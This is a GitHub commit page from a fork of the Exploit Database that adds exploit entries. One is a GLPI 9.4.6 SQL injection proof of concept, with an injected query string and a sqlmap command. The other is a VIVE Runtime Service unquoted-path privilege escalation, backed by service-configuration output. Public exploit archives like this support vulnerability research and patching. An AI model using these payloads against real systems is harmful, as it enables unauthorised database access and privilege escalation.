forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
4 changes to exploits/shellcodes VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Baixar GLPI Project 9.4.6 - SQLi
- Loading branch information
Offensive Security
committed
Mar 15, 2022
1 parent
653f886
commit 2ad6c86
Showing
4 changed files
with
43 additions
and
17 deletions.
There are no files selected for viewing
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi | ||
# Date: 10/12 | ||
# Exploit Author: Joas Antonio | ||
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/ | ||
# Software Link: https://glpi-project.org/pt-br/baixar/ | ||
# Version: GLPI - 9.4.6 | ||
# Tested on: Windows/Linux | ||
# CVE : CVE-2021-44617 | ||
|
||
#POC1: | ||
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111 | ||
|
||
sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path | ||
# Date: 11/03/2022 | ||
# Exploit Author: Faisal Alasmari | ||
# Vendor Homepage: https://www.vive.com/ | ||
# Software Link: https://developer.vive.com/resources/downloads/ | ||
# Version: 1.0.0.4 | ||
# Tested: Windows 10 x64 | ||
|
||
|
||
|
||
C:\Users\User>sc qc "VIVE Runtime Service" | ||
[SC] QueryServiceConfig SUCCESS | ||
|
||
SERVICE_NAME: VIVE Runtime Service | ||
TYPE : 10 WIN32_OWN_PROCESS | ||
START_TYPE : 2 AUTO_START | ||
ERROR_CONTROL : 1 NORMAL | ||
BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe | ||
LOAD_ORDER_GROUP : | ||
TAG : 0 | ||
DISPLAY_NAME : VIVE Runtime Service | ||
DEPENDENCIES : | ||
SERVICE_START_NAME : LocalSystem | ||
|
||
|
||
#Exploit: | ||
|
||
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters